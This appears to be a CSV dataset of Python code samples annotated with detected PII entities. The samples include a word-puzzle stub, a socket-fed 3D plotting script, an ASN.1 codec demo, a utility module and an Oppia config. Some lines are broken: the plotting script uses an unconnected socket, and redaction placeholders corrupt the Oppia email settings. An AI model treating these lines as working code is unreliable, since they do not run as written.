8488, end: 8501, score: 0.5, type: URL, start: 8576, end: 8591, score: 0.5, type: URL, start: 8736, end: 8746, score: 0.5, type: URL, start: 8813, end: 8823, score: 0.5, type: URL, start: 9030, end: 9037, score: 0.5, type: URL, start: 9066, end: 9073, score: 0.5, type: URL, start: 9113, end: 9120, score: 0.5, type: URL, start: 9218, end: 9231, score: 0.5, type: URL, start: 9631, end: 9640, score: 0.5, type: URL, start: 9747, end: 9759, score: 0.5, type: URL, start: 10495, end: 10505, score: 0.5, type: URL, start: 10962, end: 10975, score: 0.5, type: URL, start: 11019, end: 11029, score: 0.5, type: URL, start: 11844, end: 11853, score: 0.5, type: URL, start: 12042, end: 12056, score: 0.5, type: URL, start: 12164, end: 12181, score: 0.5, type: URL, start: 12223, end: 12229, score: 0.5, type: URL, start: 12943, end: 12950, score: 0.5, type: URL, start: 13018, end: 13025, score: 0.5, type: URL, start: 13078, end: 13087, score: 0.5, type: URL, start: 13261, end: 13275, score: 0.5, type: URL, start: 13383, end: 13400, score: 0.5, type: URL, start: 13421, end: 13431, score: 0.5, type: URL, start: 13440, end: 13452, score: 0.5, type: URL, start: 13587, end: 13599, score: 0.5, type: URL, start: 13772, end: 13779, score: 0.5, type: URL, start: 13834, end: 13844, score: 0.5, type: URL, start: 13853, end: 13865, score: 0.5, type: URL, start: 14006, end: 14018, score: 0.5, type: URL, start: 14197, end: 14204, score: 0.5, type: URL, start: 14487, end: 14501, score: 0.5, type: URL, start: 14809, end: 14819, score: 0.5, type: URL, start: 14886, end: 14897, score: 0.5, type: URL, start: 14968, end: 14978, score: 0.5, type: URL, start: 14981, end: 14995, score: 0.5, type: URL, start: 15026, end: 15031, score: 0.5, type: URL, start: 15403, end: 15417, score: 0.5, type: URL, start: 15452, end: 15462, score: 0.5, type: URL, start: 15664, end: 15678, score: 0.5, type: URL, start: 15861, end: 15875, score: 0.5, type: URL, start: 15973, end: 15983, score: 0.5, type: URL, start: 16140, end: 16145, score: 0.5, type: URL, start: 16204, end: 16215, score: 0.5, type: URL, start: 16420, end: 16425, score: 0.5, type: URL, start: 16489, end: 16498, score: 0.5, type: URL, start: 16570, end: 16582, score: 0.5, type: URL, start: 16613, end: 16623, score: 0.5, type: URL, start: 16641, end: 16651, score: 0.5, type: URL, start: 16766, end: 16776, score: 0.5, type: URL, start: 16785, end: 16797, score: 0.5, type: URL, start: 17076, end: 17088, score: 0.5, type: URL, start: 17173, end: 17184, score: 0.5, type: URL, start: 17216, end: 17230, score: 0.5, type: URL, start: 17328, end: 17335, score: 0.5, type: URL, start: 17417, end: 17427, score: 0.5]" +,code,length,entities +0,""""""" +[2014-11-26] Challenge #190 [Intermediate] Words inside of words + +https://www.reddit.PI:KEY + +#Description +This weeks challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a +problem rather than bruteforcing a challenge. +#Challenge +Given the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file +which also contains the greatest number of words within that word. +For example, the word 'grayson' has the following words in it +Grayson +Gray +Grays +Ray +Rays +Son +On +Here's another example, the word 'reports' has the following +reports +report +port +ports +rep +You're tasked with finding the word in that file that contains the most words. +NOTE : If you have a different wordlist you would like to use, you're free to do so. +#Restrictions +* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length +* The word you are using may not be permuted to get a different set of words (You can't change 'report' to 'repotr' so +that you can add more words to your list) +#Finally +Have a good challenge idea? +Consider submitting it to /r/dailyprogrammer_ideas +"""""" + + +def main(): + pass + + +if __name__ == ""__main__"": + main() +",1256,"[['DATE_TIME', '2014-11-26'], ['DATE_TIME', 'This weeks'], ['PERSON', 'enable1.txt](http://www.joereynoldsaudio.com'], ['PERSON', 'grayson'], ['PERSON', 'repotr'], ['URL', 'https://www.red'], ['URL', 'http://www.joereynoldsaudio.com/enable1.txt']]" +1,"from mpl_toolkits.mplot3d import axes3d +import numpy as np +import matplotlib.pyplot as plt +from matplotlib.animation import FuncAnimation +from socket import * +import time + +# Объявляем все глобальные переменные + +HOST = '127.0.0.1' +PORT = 21566 +BUFSIZ = 512 +ADDR = (HOST, PORT) + +bad_packet = 0 +good_packet = 0 +# fig, ax = plt.subplots() + +fig = plt.figure() +ax = fig.add_subplot(111, projection='3d') + +# Socket +# tcpCliSock = socket(AF_INET, SOCK_STREAM) +# tcpCliSock.connect(ADDR) +# Запрет на ожидание +plt.ion() + +tstart = time.time() +# real-time plotting loop + +X, Y, Z = [], [], [] + +while True: + try: + # читаем данные из сети + tcpCliSock.c + data = tcpCliSock.recv(BUFSIZ) + if data: + print(len(X), data) + data = data.decode().split(',') + if len(data) == 9: + # print('Data received', data) + # tcpCliSock.send(b'Ok') + + good_packet += 1 + else: + bad_packet += 1 + + # читаем данные из сети + data = tcpCliSock.recv(BUFSIZ) + X.append(data[0]) + Y.append(data[1]) + Z.append(data[2]) + + frame = ax.scatter(X, Y, Z, c='b', marker='o') + + # Remove old line collection before drawing + #if oldcol is not None: + # ax.collections.remove(oldcol) + + plt.pause(0.001 / len(X)) + + + except KeyboardInterrupt: + tcpCliSock.close() + print('FPS: %f' % (len(X) / (time.time() - tstart))) + break +",1493,"[['LOCATION', 'Объявляем'], ['LOCATION', 'PORT'], ['LOCATION', 'tcpCliSock'], ['PERSON', 'данные из'], ['PERSON', 'данные из'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'toolkits.mp'], ['URL', 'matplotlib.py'], ['URL', 'matplotlib.an'], ['URL', 'plt.su'], ['URL', 'plt.fi'], ['URL', 'fig.ad'], ['URL', 'tcpCliSock.co'], ['URL', 'plt.io'], ['URL', 'tcpCliSock.re'], ['URL', 'data.de'], ['URL', 'tcpCliSock.se'], ['URL', 'tcpCliSock.re'], ['URL', 'ax.sc'], ['URL', 'ax.collections.re'], ['URL', 'plt.pa'], ['URL', 'tcpCliSock.cl']]" +2,"#!/usr/bin/env python + +""""""Encoding and decoding of a question once for each codec. + +Example execution: + +$ ./question.py +ASN.1 specification: + +-- A simple protocol taken from Wikipedia. + +Foo DEFINITIONS ::= BEGIN + + Question ::= SEQUENCE { + id INTEGER, + question IA5String + } + + Answer ::= SEQUENCE { + id INTEGER, + answer BOOLEAN + } + +END + +Question to encode: {'id': 1, 'question': 'Is 1+1=3?'} + +BER: +Encoded: 300e0201011609497320312b313d333f (16 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +DER: +Encoded: 300e0201011609497320312b313d333f (16 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +JER: +Encoded: PI:KEY (31 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +OER: +Encoded: 010109497320312b313d333f (12 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +PER: +Encoded: 010109497320312b313d333f (12 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +UPER: +Encoded: 01010993cd03156c5eb37e (11 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +XER: +Encoded: PI:KEY (61 bytes) +Decoded: {'id': 1, 'question': 'Is 1+1=3?'} + +Protocol Buffers: +Encoded: 08011209497320312b313d333f (13 bytes) +Decoded: +id: 1 +question: ""Is 1+1=3?"" +$ + +"""""" + +from __future__ import print_function +import os +from binascii import hexlify +import asn1tools +from foo_pb2 import Question + +SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__)) +FOO_ASN_PATH = os.path.join(SCRIPT_DIR, + '..', + '..', + '..', + 'tests', + 'files', + 'foo.asn') + +# Print the specification. +print('ASN.1 specification:') +print() + +with open(FOO_ASN_PATH) as fin: + print(fin.read()) + +# The question to encode. +question = {'id': 1, 'question': 'Is 1+1=3?'} + +print(""Question to encode:"", question) + +# Encode and decode the question once for each codec. +for codec in ['ber', 'der', 'jer', 'oer', 'per', 'uper', 'xer']: + foo = asn1tools.compile_files(FOO_ASN_PATH, codec) + encoded = foo.encode('Question', question) + decoded = foo.decode('Question', encoded) + + print() + print('{}:'.format(codec.upper())) + print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'), + len(encoded))) + print('Decoded:', decoded) + + +# Also encode using protocol buffers. +question = Question() +question.id = 1 +question.question = 'Is 1+1=3?' + +encoded = question.SerializeToString() +decoded = question + +print() +print('Protocol Buffers:') +print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'), + len(encoded))) +print('Decoded:') +print(decoded) +",2721,"[['PERSON', 'ASN.1'], ['DATE_TIME', '010109497320312b313d333f'], ['DATE_TIME', '010109497320312b313d333f'], ['PERSON', 'oer'], ['IP_ADDRESS', ' ::'], ['URL', 'question.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.jo'], ['URL', 'foo.as'], ['URL', 'fin.re'], ['URL', 'asn1tools.com'], ['URL', 'foo.de'], ['URL', 'question.id'], ['URL', 'question.Se']]" +3,"# -*- coding: utf-8 -*- + +# Copyright (C) 2014 Johannes Baiter dummy@email.com +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. + +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . + +"""""" +Various utility functions and classes. +"""""" + +from __future__ import division, unicode_literals, print_function + +import abc +import glob +import json +import logging +import os +import pkg_resources +import platform +import re +import subprocess +from unicodedata import normalize + +import blinker +import colorama +import psutil +import roman +from colorama import Fore, Back, Style +from spreads.vendor.pathlib import Path + + +class SpreadsException(Exception): + """""" General exception """""" + pass + + +class DeviceException(SpreadsException): + """""" Raised when a device-related error occured. """""" + pass + + +class MissingDependencyException(SpreadsException): + """""" Raised when a dependency for a plugin is missing. """""" + pass + + +def get_version(): + """""" Get installed version via pkg_resources. """""" + return pkg_resources.require('spreads')[0].version + + +def find_in_path(name): + """""" Find executable in $PATH. + + :param name: name of the executable + :type name: unicode + :returns: Path to executable or None if not found + :rtype: unicode or None + + """""" + candidates = None + if is_os('windows'): + import _winreg + if name.startswith('scantailor'): + try: + cmd = _winreg.QueryValue( + _winreg.HKEY_CLASSES_ROOT, + 'Scan Tailor Project\\shell\\open\\command') + bin_path = cmd.split('"" ""')[0][1:] + if name.endswith('-cli'): + bin_path = bin_path[:-4] + ""-cli.exe"" + return bin_path if os.path.exists(bin_path) else None + except OSError: + return None + else: + path_dirs = os.environ.get('PATH').split(';') + path_dirs.append(os.getcwd()) + path_exts = os.environ.get('PATHEXT').split(';') + candidates = (os.path.join(p, name + e) + for p in path_dirs + for e in path_exts) + else: + candidates = (os.path.join(p, name) + for p in os.environ.get('PATH').split(':')) + return next((c for c in candidates if os.path.exists(c)), None) + + +def is_os(osname): + """""" Check if the current operating system matches the expected. + + :param osname: Operating system name as returned by + :py:func:`platform.system` + :returns: Whether the OS matches or not + :rtype: bool + """""" + return platform.system().lower() == osname + + +def check_futures_exceptions(futures): + """""""" Go through passed :py:class:`concurrent.futures._base.Future` objects + and re-raise the first Exception raised by any one of them. + + :param futures: Iterable that contains the futures to be checked + :type futures: iterable with :py:class:`concurrent.futures._base.Future` + instances + """""" + if any(x.exception() for x in futures): + raise next(x for x in futures if x.exception()).exception() + + +def get_free_space(path): + """""" Return free space on file-system underlying the passed path. + + :param path: Path on file-system the free space of which is desired. + :type path; unicode + :return: Free space in bytes. + :rtype: int + + """""" + return psutil.disk_usage(unicode(path)).free + + +def get_subprocess(cmdline, **kwargs): + """""" Get a :py:class:`subprocess.Popen` instance. + + On Windows systems, the process will be ran in the background and won't + open a cmd-window or appear in the taskbar. + The function signature matches that of the :py:class:`subprocess.Popen` + initialization method. + """""" + if subprocess.mswindows and 'startupinfo' not in kwargs: + su = subprocess.STARTUPINFO() + su.dwFlags |= subprocess.STARTF_USESHOWWINDOW + su.wShowWindow = subprocess.SW_HIDE + kwargs['startupinfo'] = su + return subprocess.Popen(cmdline, **kwargs) + + +def wildcardify(pathnames): + """""" Try to generate a single path with wildcards that matches all + `pathnames`. + + :param pathnames: List of pathnames to find a wildcard string for + :type pathanmes: List of str/unicode + :return: The wildcard string or None if none was found + :rtype: unicode or None + """""" + wildcard_str = """" + for idx, char in enumerate(pathnames[0]): + if all(p[idx] == char for p in pathnames[1:]): + wildcard_str += char + elif not wildcard_str or wildcard_str[-1] != ""*"": + wildcard_str += ""*"" + matched_paths = glob.glob(wildcard_str) + if not sorted(pathnames) == sorted(matched_paths): + return None + return wildcard_str + + +def diff_dicts(old, new): + """""" Get the difference between two dictionaries. + + :param old: Dictionary to base comparison on + :type old: dict + :param new: Dictionary to compare with + :type new: dict + :return: A (possibly nested) dictionary containing all items from `new` + that differ from the ones in `old` + :rtype: dict + """""" + out = {} + for key, value in old.iteritems(): + if new[key] != value: + out[key] = new[key] + elif isinstance(value, dict): + diff = diff_dicts(value, new[key]) + if diff: + out[key] = diff + return out + + +def slugify(text, delimiter=u'-'): + """"""Generates an ASCII-only slug. + + Code adapted from Flask snipped by Armin Ronacher: + http://flask.pocoo.org/snippets/5/ + + :param text: Text to create slug for + :type text: unicode + :param delimiter: Delimiter to use in slug + :type delimiter: unicode + :return: The generated slug + :rtype: unicode + """""" + punctuation_re = r'[\t !""#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+' + result = [] + for word in re.split(punctuation_re, text.lower()): + word = normalize('NFKD', word).encode('ascii', 'ignore') + if word: + result.append(word) + return unicode(delimiter.join(result)) + + +class _instancemethodwrapper(object): # noqa + def __init__(self, callable): + self.callable = callable + self.__dontcall__ = False + + def __getattr__(self, key): + return getattr(self.callable, key) + + def __call__(self, *args, **kwargs): + if self.__dontcall__: + raise TypeError('Attempted to call abstract method.') + return self.callable(*args, **kwargs) + + +class _classmethod(classmethod): # noqa + def __init__(self, func): + super(_classmethod, self).__init__(func) + isabstractmethod = getattr(func, '__isabstractmethod__', False) + if isabstractmethod: + self.__isabstractmethod__ = isabstractmethod + + def __get__(self, instance, owner): + result = _instancemethodwrapper(super(_classmethod, self) + .__get__(instance, owner)) + isabstractmethod = getattr(self, '__isabstractmethod__', False) + if isabstractmethod: + result.__isabstractmethod__ = isabstractmethod + abstractmethods = getattr(owner, '__abstractmethods__', None) + if abstractmethods and result.__name__ in abstractmethods: + result.__dontcall__ = True + return result + + +class abstractclassmethod(_classmethod): # noqa + """""" New decorator class that implements the @abstractclassmethod decorator + added in Python 3.3 for Python 2.7. + + Kudos to http://stackoverflow.com/a/13640018/487903 + """""" + def __init__(self, func): + func = abc.abstractmethod(func) + super(abstractclassmethod, self).__init__(func) + + +class ColourStreamHandler(logging.StreamHandler): + """""" A colorized output StreamHandler + + Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5 + """""" + + # Some basic colour scheme defaults + colours = { + 'DEBUG': Fore.CYAN, + 'INFO': Fore.GREEN, + 'WARN': Fore.YELLOW, + 'WARNING': Fore.YELLOW, + 'ERROR': Fore.RED, + 'CRIT': Back.RED + Fore.WHITE, + 'CRITICAL': Back.RED + Fore.WHITE + } + + @property + def is_tty(self): + """""" Check if we are using a ""real"" TTY. If we are not using a TTY it + means that the colour output should be disabled. + + :return: Using a TTY status + :rtype: bool + """""" + try: + return getattr(self.stream, 'isatty', None)() + except: + return False + + def emit(self, record): + try: + message = self.format(record) + if not self.is_tty: + self.stream.write(message) + else: + self.stream.write(self.colours[record.levelname] + + message + Style.RESET_ALL) + self.stream.write(getattr(self, 'terminator', '\n')) + self.flush() + except (KeyboardInterrupt, SystemExit): + raise + except: + self.handleError(record) + + +class EventHandler(logging.Handler): + """""" Subclass of :py:class:`logging.Handler` that emits a + :py:class:`blinker.base.Signal` whenever a new record is emitted. + """""" + signals = blinker.Namespace() + on_log_emit = signals.signal('logrecord', doc=""""""\ + Sent when a log record was emitted. + + :keyword :class:`logging.LogRecord` record: the LogRecord + """""") + + def emit(self, record): + self.on_log_emit.send(record=record) + + +def get_data_dir(create=False): + """""" Return (and optionally create) the user's default data directory. + + :param create: Create the data directory if it doesn't exist + :type create: bool + :return: Path to the default data directory + :rtype: unicode + """""" + unix_dir_var = 'XDG_DATA_HOME' + unix_dir_fallback = '~/.config' + windows_dir_var = 'APPDATA' + windows_dir_fallback = '~\\AppData\\Roaming' + mac_dir = '~/Library/Application Support' + base_dir = None + if is_os('darwin'): + if Path(unix_dir_fallback).exists: + base_dir = unix_dir_fallback + else: + base_dir = mac_dir + elif is_os('windows'): + if windows_dir_var in os.environ: + base_dir = os.environ[windows_dir_var] + else: + base_dir = windows_dir_fallback + else: + if unix_dir_var in os.environ: + base_dir = os.environ[unix_dir_var] + else: + base_dir = unix_dir_fallback + app_path = Path(base_dir)/'spreads' + if create and not app_path.exists(): + app_path.mkdir() + return unicode(app_path) + + +def colorize(text, color): + """""" Return text with a new ANSI foreground color. + + :param text: Text to be wrapped + :param color: ANSI color to wrap text in + :type color: str (from `colorama.ansi `) + :return: Colorized text + """""" + return color + text + colorama.Fore.RESET + + +class RomanNumeral(object): + """""" Number type that represents integers as Roman numerals and that + can be used in all arithmetic operations applicable to integers. + """""" + @staticmethod + def is_roman(value): + """""" Check if `value` is a valid Roman numeral. + + :param value: Value to be checked + :type value: unicode + :returns: Whether the value is valid or not + :rtype: bool + """""" + return bool(roman.romanNumeralPattern.match(value)) + + def __init__(self, value, case='upper'): + """""" Create a new instance. + + :param value: Value of the instance + :type value: int, unicode containing valid Roman numeral or + :py:class:`RomanNumeral` + """""" + self._val = self._to_int(value) + self._case = case + if isinstance(value, basestring) and not self.is_roman(value): + self._case = 'lower' + elif isinstance(value, RomanNumeral): + self._case = value._case + + def _to_int(self, value): + if isinstance(value, int): + return value + elif isinstance(value, basestring) and self.is_roman(value.upper()): + return roman.fromRoman(value.upper()) + elif isinstance(value, RomanNumeral): + return value._val + else: + raise ValueError(""Value must be a valid roman numeral, a string"" + "" representing one or an integer: '{0}'"" + .format(value)) + + def __cmp__(self, other): + if self._val > self._to_int(other): + return 1 + elif self._val == self._to_int(other): + return 0 + elif self._val < self._to_int(other): + return -1 + + def __add__(self, other): + return RomanNumeral(self._val + self._to_int(other), self._case) + + def __sub__(self, other): + return RomanNumeral(self._val - self._to_int(other), self._case) + + def __int__(self): + return self._val + + def __str__(self): + strval = roman.toRoman(self._val) + if self._case == 'lower': + return strval.lower() + else: + return strval + + def __unicode__(self): + return unicode(str(self)) + + def __repr__(self): + return str(self) + + +class CustomJSONEncoder(json.JSONEncoder): + """""" Custom :py:class:`json.JSONEncoder`. + + Uses an object's `to_dict` method if present for serialization. + + Serializes :py:class:`pathlib.Path` instances to the string + representation of their relative path to a BagIt-compliant directory or + their absolute path if not applicable. + """""" + def default(self, obj): + if hasattr(obj, 'to_dict'): + return obj.to_dict() + if isinstance(obj, Path): + # Serialize paths that belong to a workflow as paths relative to + # its base directory + base = next((p for p in obj.parents if (p/'bagit.txt').exists()), + None) + if base: + return unicode(obj.relative_to(base)) + else: + return unicode(obj.absolute()) + return json.JSONEncoder.default(self, obj) +",14758,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Johannes Baiter'], ['PERSON', 'get_subprocess(cmdline'], ['PERSON', 'Armin Ronacher'], ['PERSON', 'punctuation_re'], ['PERSON', 'Kudos'], ['PERSON', 'Leigh MacDonald'], ['URL', 'blinker.Na'], ['URL', 'signals.si'], ['NRP', 'Serialize'], ['LOCATION', 'next((p'], ['LOCATION', 'unicode(obj.relative_to(base'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://flask.pocoo.org/snippets/5/'], ['URL', 'http://stackoverflow.com/a/13640018/487903'], ['URL', 'http://goo.gl/Lpr6C5'], ['URL', 'http://git.io/9qnt0Q'], ['URL', 'email.com'], ['URL', 'spreads.vendor.pa'], ['URL', 'resources.re'], ['URL', 'name.st'], ['URL', 'winreg.HK'], ['URL', 'os.pa'], ['URL', 'os.environ.ge'], ['URL', 'os.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.environ.ge'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'platform.sy'], ['URL', 'subprocess.ms'], ['URL', 'subprocess.ST'], ['URL', 'subprocess.ST'], ['URL', 'su.wS'], ['URL', 'glob.gl'], ['URL', 'old.it'], ['URL', 'delimiter.jo'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'logging.St'], ['URL', 'Fore.CY'], ['URL', 'Fore.GR'], ['URL', 'Fore.YE'], ['URL', 'Fore.YE'], ['URL', 'Fore.RED'], ['URL', 'Back.RED'], ['URL', 'Back.RED'], ['URL', 'self.st'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'Style.RE'], ['URL', 'self.st'], ['URL', 'blinker.base.Si'], ['URL', 'emit.se'], ['URL', 'path.mk'], ['URL', 'colorama.an'], ['URL', 'colorama.Fore.RE'], ['URL', 'roman.romanNumeralPattern.ma'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'roman.fr'], ['URL', 'roman.to'], ['URL', 'pathlib.Pa'], ['URL', 'obj.to'], ['URL', 'obj.pa'], ['URL', 'obj.re'], ['URL', 'json.JSONEncoder.de']]" +4,"# coding: utf-8 +# +# Copyright 2014 The Oppia Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS-IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""""""Stores various configuration options and constants for Oppia."""""" + +import copy +import datetime +import os + + +# Whether to unconditionally log info messages. +DEBUG = False + +# The platform for the storage backend. This is used in the model-switching +# code in core/platform. +PLATFORM = 'gae' + +# This should be string comparison, since all environment variables +# are converted to string +IS_MINIFIED = os.environ.get('MINIFICATION') == 'True' + +# Whether we should serve the development or production experience. +# DEV_MODE should only be changed to False in the production environment. +# To use minified resources in the development environment, +# change the MINIFICATION env variable in app.yaml to True. +# When DEV_MODE is True, this indicates that we are not running in +# the production App Engine environment, which affects things like +# login/logout URLs,as well as third-party libraries +# that App Engine normally provides. +if PLATFORM == 'gae': + DEV_MODE = ( + not os.environ.get('SERVER_SOFTWARE') + or os.environ['SERVER_SOFTWARE'].startswith('Development')) +else: + raise Exception('Invalid platform: expected one of [\'gae\']') + +TESTS_DATA_DIR = os.path.join('core', 'tests', 'data') +SAMPLE_EXPLORATIONS_DIR = os.path.join('data', 'explorations') +SAMPLE_COLLECTIONS_DIR = os.path.join('data', 'collections') +INTERACTIONS_DIR = os.path.join('extensions', 'interactions') +GADGETS_DIR = os.path.join('extensions', 'gadgets') +RTE_EXTENSIONS_DIR = os.path.join('extensions', 'rich_text_components') + +OBJECT_TEMPLATES_DIR = os.path.join('extensions', 'objects', 'templates') + +# Choose production template if minification flag is used or +# if in production mode +TEMPLATES_DIR_PREFIX = 'prod' if (IS_MINIFIED or not DEV_MODE) else 'dev' +FRONTEND_TEMPLATES_DIR = os.path.join( + 'core', 'templates', TEMPLATES_DIR_PREFIX, 'head') +DEPENDENCIES_TEMPLATES_DIR = os.path.join('extensions', 'dependencies') +VALUE_GENERATORS_DIR = os.path.join('extensions', 'value_generators') +OBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join( + 'extensions', 'interactions', 'object_defaults.json') +RULES_DESCRIPTIONS_FILE_PATH = os.path.join( + os.getcwd(), 'extensions', 'interactions', 'rules.json') + +# The maximum number of results to retrieve in a datastore query. +DEFAULT_QUERY_LIMIT = 1000 + +# The maximum number of results to retrieve in a datastore query +# for top rated published explorations in /library page. +NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8 + +# The maximum number of results to retrieve in a datastore query +# for recently published explorations in /library page. +RECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8 + +# The maximum number of results to retrieve in a datastore query +# for top rated published explorations in /library/top_rated page. +NUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20 + +# The maximum number of results to retrieve in a datastore query +# for recently published explorations in /library/recently_published page. +RECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20 + +# The current version of the dashboard stats blob schema. If any backward- +# incompatible changes are made to the stats blob schema in the data store, +# this version number must be changed. +CURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1 + +# The current version of the exploration states blob schema. If any backward- +# incompatible changes are made to the states blob schema in the data store, +# this version number must be changed and the exploration migration job +# executed. +CURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7 + +# The current version of the all collection blob schemas (such as the nodes +# structure within the Collection domain object). If any backward-incompatible +# changes are made to any of the blob schemas in the data store, this version +# number must be changed. +CURRENT_COLLECTION_SCHEMA_VERSION = 2 + +# The default number of exploration tiles to load at a time in the search +# results page. +SEARCH_RESULTS_PAGE_SIZE = 20 + +# The default number of commits to show on a page in the exploration history +# tab. +COMMIT_LIST_PAGE_SIZE = 50 + +# The default number of items to show on a page in the exploration feedback +# tab. +FEEDBACK_TAB_PAGE_SIZE = 20 + +# Default title for a newly-minted exploration. +DEFAULT_EXPLORATION_TITLE = '' +# Default category for a newly-minted exploration. +DEFAULT_EXPLORATION_CATEGORY = '' +# Default objective for a newly-minted exploration. +DEFAULT_EXPLORATION_OBJECTIVE = '' + +# Default name for the initial state of an exploration. +DEFAULT_INIT_STATE_NAME = 'Introduction' +# The default content text for the initial state of an exploration. +DEFAULT_INIT_STATE_CONTENT_STR = '' + +# Default title for a newly-minted collection. +DEFAULT_COLLECTION_TITLE = '' +# Default category for a newly-minted collection. +DEFAULT_COLLECTION_CATEGORY = '' +# Default objective for a newly-minted collection. +DEFAULT_COLLECTION_OBJECTIVE = '' + +# A dict containing the accepted image formats (as determined by the imghdr +# module) and the corresponding allowed extensions in the filenames of uploaded +# files. +ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = { + 'jpeg': ['jpg', 'jpeg'], + 'png': ['png'], + 'gif': ['gif'] +} + +# A string containing the disallowed characters in state or exploration names. +# The underscore is needed because spaces in names must be converted to +# underscores when displayed as part of a URL or key. The other conventions +# here are derived from the Wikipedia guidelines for naming articles. +INVALID_NAME_CHARS = u':#/|_%<>[]{}\ufffd\\' + chr(127) +for ind in range(32): + INVALID_NAME_CHARS += chr(ind) +# Prefix for data sent from the server to the client via JSON. +XSSI_PREFIX = ')]}\'\n' +# A regular expression for alphanumeric characters. +ALPHANUMERIC_REGEX = r'^[A-Za-z0-9]+$' +# A regular expression for alphanumeric words separated by single spaces. +# Ex.: 'valid name', 'another valid name', 'invalid name'. +ALPHANUMERIC_SPACE_REGEX = r'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$' +# A regular expression for tags. +TAG_REGEX = r'^[a-z ]+$' + +# Invalid names for parameters used in expressions. +AUTOMATICALLY_SET_PARAMETER_NAMES = ['answer', 'choices'] +INVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [ + 'abs', 'all', 'and', 'any', 'else', 'floor', 'if', 'log', 'or', + 'pow', 'round', 'then'] + +# These are here rather than in rating_services.py to avoid import +# circularities with exp_services. +# TODO (Jacob) Refactor exp_services to remove this problem. +_EMPTY_RATINGS = {'1': 0, '2': 0, '3': 0, '4': 0, '5': 0} +def get_empty_ratings(): + return copy.deepcopy(_EMPTY_RATINGS) + +# Empty scaled average rating as a float. +EMPTY_SCALED_AVERAGE_RATING = 0.0 + +# To use GAE email service. +EMAIL_SERVICE_PROVIDER_GAE = 'gae_email_service' +# To use mailgun email service. +EMAIL_SERVICE_PROVIDER_MAILGUN = 'mailgun_email_service' +# Use GAE email service by default. +EMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE +# If the Mailgun email API is used, the ""None"" below should be replaced +# with the Mailgun API key. +MAILGUN_API_KEY = None +# If the Mailgun email API is used, the ""None"" below should be replaced +# with the Mailgun domain name (ending with mailgun.org). +MAILGUN_DOMAIN_NAME = None +# Committer id for system actions. +SYSTEM_COMMITTER_ID = 'admin' +SYSTEM_EMAIL_ADDRESS = dummy@email.com' +ADMIN_EMAIL_ADDRESS = dummy@email.com' +NOREPLY_EMAIL_ADDRESS = dummy@email.com' +# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and +# correspond to owners of the app before setting this to True. If +# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this +# address cannot be sent. If True then emails can be sent to any user. +CAN_SEND_EMAILS = False +# If you want to turn on this facility please check the email templates in the +# send_role_notification_email() function in email_manager.py and modify them +# accordingly. +CAN_SEND_EDITOR_ROLE_EMAILS = False +# If enabled then emails will be sent to creators for feedback messages. +CAN_SEND_FEEDBACK_MESSAGE_EMAILS = False +# Time to wait before sending feedback message emails (currently set to 1 +# hour). +DEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600 +# Whether to send an email when new feedback message is received for +# an exploration. +DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True +# Whether to send email updates to a user who has not specified a preference. +DEFAULT_EMAIL_UPDATES_PREFERENCE = False +# Whether to send an invitation email when the user is granted +# new role permissions in an exploration. +DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True +# Whether to require an email to be sent, following a moderator action. 